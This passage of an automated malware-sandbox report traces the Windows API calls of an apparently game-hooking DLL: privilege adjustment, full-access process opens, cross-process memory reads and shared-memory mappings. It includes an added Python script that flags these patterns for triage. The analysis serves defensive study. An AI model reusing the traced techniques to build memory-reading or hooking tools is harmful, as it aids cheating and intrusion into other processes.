                                                                                  • _sprintf.LIBCMT ref: 6A6DDE30
                                                                                    • Part of subcall function 6A6D50B0: _memset.LIBCMT ref: 6A6D50E5
                                                                                    • Part of subcall function 6A6D50B0: _sprintf.LIBCMT ref: 6A6D50FB
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DDE51
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 6A6DDE78
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 6A6DDE8A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Mapping_sprintf$CreateCurrentLocalOpenProcessTimeView_memset
                                                                                  • String ID: %d-{%d}-%d$TH_MAP_DATA
                                                                                  • API String ID: 626235581-1469962609
                                                                                  • Opcode ID: 88e5fb795214ba890898f144687dc9effea38c547c0fdd6175bde45deacb2df8
                                                                                  • Instruction ID: f95d43f7274b14d5877f20c920873c63004d632945e20758e5a9068aa35c7ad9
                                                                                  • Opcode Fuzzy Hash: 88e5fb795214ba890898f144687dc9effea38c547c0fdd6175bde45deacb2df8
                                                                                  • Instruction Fuzzy Hash: 0C31AAB16083409FC784DFA8C945B6BBBF5AF89700F44492EF189D3291EB70D908CB16
                                                                                  APIs
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DDF1E
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DDF37
                                                                                  • OutputDebugStringA.KERNEL32(OpenFileMapping failed,75920F00,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?), ref: 6A6DDF51
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?,?), ref: 6A6DDF58
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?), ref: 6A6DDF83
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugFileOutputString$MappingOpenView__wfopen_s
                                                                                  • String ID: C:\pl.txt$OpenFileMapping failed$TH_MAP_DATA
                                                                                  • API String ID: 3806545002-2707373594
                                                                                  • Opcode ID: 9f1397f0d0b255593e0b47e2808abb8bd1133e77ab48a7ef58ec38c17bec2834
                                                                                  • Instruction ID: fd51e78db14b969e893d17f3957724880ad7be1d548ca7db70ae8498ee88a062
                                                                                  • Opcode Fuzzy Hash: 9f1397f0d0b255593e0b47e2808abb8bd1133e77ab48a7ef58ec38c17bec2834
                                                                                  • Instruction Fuzzy Hash: BC213EB1A08300AFC744DF65C942B5ABBE5AB8D604F45482EF589D7241EA70AE44DB87
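                                                                                  The entries above for module 6A6D0000 document two things worth pulling out of the trace: the routine that calls RtlAdjustPrivilege, opens a process via ZwOpenProcess with DesiredAccess 001FFFFF (PROCESS_ALL_ACCESS) and then reads 0x40000 bytes from fixed addresses 00530000, 005B0000 and 00510000 with ReadProcessMemory, and the two routines that open or create the TH_MAP_DATA file mapping with access 000F001F (FILE_MAP_ALL_ACCESS). The helper below is an added triage script for this page, not part of Joe Sandbox or of the sample; it parses the report's "APIs" listing format into records and flags exactly these patterns. The sample text is copied from the two listings above; the argument positions it interprets are the documented parameter orders of the Win32/Nt APIs, and it deliberately ignores the extra stack slots Joe Sandbox prints after the real parameters (which is why the first ZwOpenProcess line, whose DesiredAccess slot is "?", is not flagged while the second one is).

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report into
structured records and flag the cross-process access pattern they document.
Added triage helper for this page; it is not part of Joe Sandbox."""
import re
from dataclasses import dataclass
from typing import Optional

PROCESS_ALL_ACCESS = 0x1FFFFF     # DesiredAccess seen in the ZwOpenProcess trace
FILE_MAP_ALL_ACCESS = 0x000F001F  # dwDesiredAccess seen in OpenFileMappingA/MapViewOfFile

# One report line: "• [Part of subcall function ADDR: ]Api.MODULE(args), ref: ADDR"
# The bullet is optional so copied text without it still parses.
_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                    # argument tokens as printed; '?' means unresolved
    ref: int                      # call-site address
    subcall: Optional[int] = None  # set for "Part of subcall function" lines


def parse_api_lines(text: str) -> list:
    """Return the ApiCall records in `text`; headers such as 'APIs'/'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def hexarg(call: ApiCall, index: int) -> Optional[int]:
    """Numeric value of positional argument `index`; None if '?', absent or a string.
    Joe Sandbox prints extra stack slots after the real parameters, so callers
    only ask for the documented positions of each API."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:
        return None


def flag_behaviours(calls: list) -> dict:
    """Summarise privilege adjustment, full-access process opens, cross-process
    reads as (base, size) pairs, and named-section (shared memory) usage."""
    out = {"privilege_adjust": False, "full_access_opens": [],
           "cross_process_reads": [], "section_calls": [], "full_access_sections": []}
    for c in calls:
        if c.api == "RtlAdjustPrivilege":
            out["privilege_adjust"] = True
        elif c.api in ("ZwOpenProcess", "NtOpenProcess", "OpenProcess"):
            # DesiredAccess is parameter 0 for OpenProcess, 1 for Nt/ZwOpenProcess
            access = hexarg(c, 0 if c.api == "OpenProcess" else 1)
            if access is not None and (access & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
                out["full_access_opens"].append(c.ref)
        elif c.api == "ReadProcessMemory":
            # (hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead)
            out["cross_process_reads"].append((hexarg(c, 1), hexarg(c, 3)))
        elif c.api in ("OpenFileMappingA", "CreateFileMappingA", "MapViewOfFile"):
            out["section_calls"].append((c.api, c.ref))
            # dwDesiredAccess: parameter 0 of OpenFileMapping, 1 of MapViewOfFile
            idx = {"OpenFileMappingA": 0, "MapViewOfFile": 1}.get(c.api)
            if idx is not None and hexarg(c, idx) == FILE_MAP_ALL_ACCESS:
                out["full_access_sections"].append(c.ref)
    return out


# Constructed sample: the two "APIs" listings copied from the report entries for
# module 6A6D0000 (snapshot hcaresult_2_2_6a6d0000), leading whitespace removed.
SAMPLE = """APIs
• Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
• Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
• Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
• Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
• _memset.LIBCMT ref: 6A6D86C5
• ReadProcessMemory.KERNEL32(00000000,00530000,?,00040000,?,?,00000000,0003FFFF,6A6DA314,?), ref: 6A6D86E8
• ReadProcessMemory.KERNEL32(00000000,005B0000,?,00040000,?), ref: 6A6D87D7
• ReadProcessMemory.KERNEL32(00000000,00510000,?,00040000,?), ref: 6A6D88C4
• CloseHandle.KERNEL32(00000000), ref: 6A6D89A1
Strings
APIs
• GetLocalTime.KERNEL32(00000000,00000000), ref: 6A6DDE01
• GetCurrentProcessId.KERNEL32 ref: 6A6DDE07
• _sprintf.LIBCMT ref: 6A6DDE30
• OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DDE51
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 6A6DDE78
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 6A6DDE8A
"""

if __name__ == "__main__":
    import pprint
    pprint.pprint(flag_behaviours(parse_api_lines(SAMPLE)))
```

                                                                                  Running the script on SAMPLE reports one full-access open (at 6A6DD96F), three 0x40000-byte reads at 00530000, 005B0000 and 00510000, and the three section calls with FILE_MAP_ALL_ACCESS on the open and map-view calls; paste any other "APIs" listing from the report in place of SAMPLE to triage it the same way.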
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,?), ref: 6A6D3D19
                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 6A6D3D25
                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 6A6D3D62
                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 6A6D3D69
                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 6A6D3D95
                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 6A6D3D9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentWow64$AddressLibraryLoadProc
                                                                                  • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                                                  • API String ID: 4086309646-1263206204
                                                                                  • Opcode ID: 69edd408c561eae8eb775671bb73f638b040f592f1fe2d6ecd7c11a73d561bc7
                                                                                  • Instruction ID: ba42c16d66c042171e9681691385bd9717300cadf8a1768c928fc5dea62e79a1
                                                                                  • Opcode Fuzzy Hash: 69edd408c561eae8eb775671bb73f638b040f592f1fe2d6ecd7c11a73d561bc7
                                                                                  • Instruction Fuzzy Hash: 73111FB1808311AFC700EFA5C94949BBBF8FE88651F888D1DF195D6110E738DA48CF96
                                                                                  APIs
                                                                                  • __EH_prolog3_catch.LIBCMT ref: 6A6F3D81
                                                                                  • EnterCriticalSection.KERNEL32(?,00000010,6A6F403D,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3D92
                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3DB0
                                                                                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3DE4
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3E50
                                                                                  • _memset.LIBCMT ref: 6A6F3E6F
                                                                                  • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,?,?,00000001), ref: 6A6F3E80
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3EA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1891723912-0
                                                                                  • Opcode ID: f648129742cd0c676c9654de65a1f00af17a4678f1ef9f799da97dcba1c63444
                                                                                  • Instruction ID: 39ec5ee8aed30066f4df55f4b247053e208035e02950f8a80d80b28e69ef4f70
                                                                                  • Opcode Fuzzy Hash: f648129742cd0c676c9654de65a1f00af17a4678f1ef9f799da97dcba1c63444
                                                                                  • Instruction Fuzzy Hash: 34319CB0500606EFDB209F50C889C5AFBF2FF05314B21C92AE926A7554CF35AD52CF95
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D4EE7
                                                                                  • _sprintf.LIBCMT ref: 6A6D4F02
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D4F19
                                                                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,00000008,6A732B2C,00000002,75919350,?), ref: 6A6D4F32
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,00000008,6A732B2C,00000002,75919350,?), ref: 6A6D4F39
                                                                                  Strings
                                                                                  • UnionZsShareDate nGameType is : %d hotkeyFlag is : %d, hookFlag : %d, xrefs: 6A6D4EFC
                                                                                  • C:\pl.txt, xrefs: 6A6D4F13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_sprintf
                                                                                  • String ID: C:\pl.txt$UnionZsShareDate nGameType is : %d hotkeyFlag is : %d, hookFlag : %d
                                                                                  • API String ID: 970810673-172700874
                                                                                  • Opcode ID: 417b61721b46335a859616393155f456e87d6565d527039eb360f6ea4e044b5c
                                                                                  • Instruction ID: 7073590afb966db59fb9f9d03577f033df955d72516e2a67fec99f0cd4e4cc27
                                                                                  • Opcode Fuzzy Hash: 417b61721b46335a859616393155f456e87d6565d527039eb360f6ea4e044b5c
                                                                                  • Instruction Fuzzy Hash: 43A126B18047859BC730EFA9C598557BBE0AF06344B06CD2DE1EA47622EF70E940CB92
                                                                                  APIs
                                                                                  • GetThreadLocale.KERNEL32(00000000,0BEA0093,?,?,00000000,00000000), ref: 0BE9FDFE
                                                                                    • Part of subcall function 0BE9E548: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$InfoThread
                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                  • API String ID: 4232894706-2493093252
                                                                                  • Opcode ID: b16494e469d49e50582bd1e582c42b5fb289f86e543de45ddfe485d1621a4bc5
                                                                                  • Instruction ID: ac9e4f5668c2361f8ded9cb40987799e308fb6d44a5a059f615096ae847b8bc9
                                                                                  • Opcode Fuzzy Hash: b16494e469d49e50582bd1e582c42b5fb289f86e543de45ddfe485d1621a4bc5
                                                                                  • Instruction Fuzzy Hash: AA6133307002499FEF11EBB9E8926DE77BADF89240F50B435E201AB345DA35DD0D9761
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DFF7B
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,00000220), ref: 6A6DFF8D
                                                                                  • Module32First.KERNEL32 ref: 6A6DFFDC
                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 6A6E0065
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E006F
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000008,?,?,00000000,00000220), ref: 6A6E00AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleModule32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                  • String ID: tmp
                                                                                  • API String ID: 2655431330-753892680
                                                                                  • Opcode ID: f5ea16deadec177a84c5573d340a0b2ce2203a0dab7b4ffa5f395380a5553e17
                                                                                  • Instruction ID: 1b437b19c6b5f0cd4e77601cf1e97cf9f110e8e3b35ec491dff07995838290c8
                                                                                  • Opcode Fuzzy Hash: f5ea16deadec177a84c5573d340a0b2ce2203a0dab7b4ffa5f395380a5553e17
                                                                                  • Instruction Fuzzy Hash: 9851E9702092025FE300DBA8DC98F6A73E9FFC5318F068A69D465CB195EF34D50AC751
                                                                                  APIs
                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0BEA27B9
                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0BEA27D5
                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0BEA280E
                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0BEA289A
                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0BEA28B9
                                                                                  • VariantCopy.OLEAUT32(?), ref: 0BEA28EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
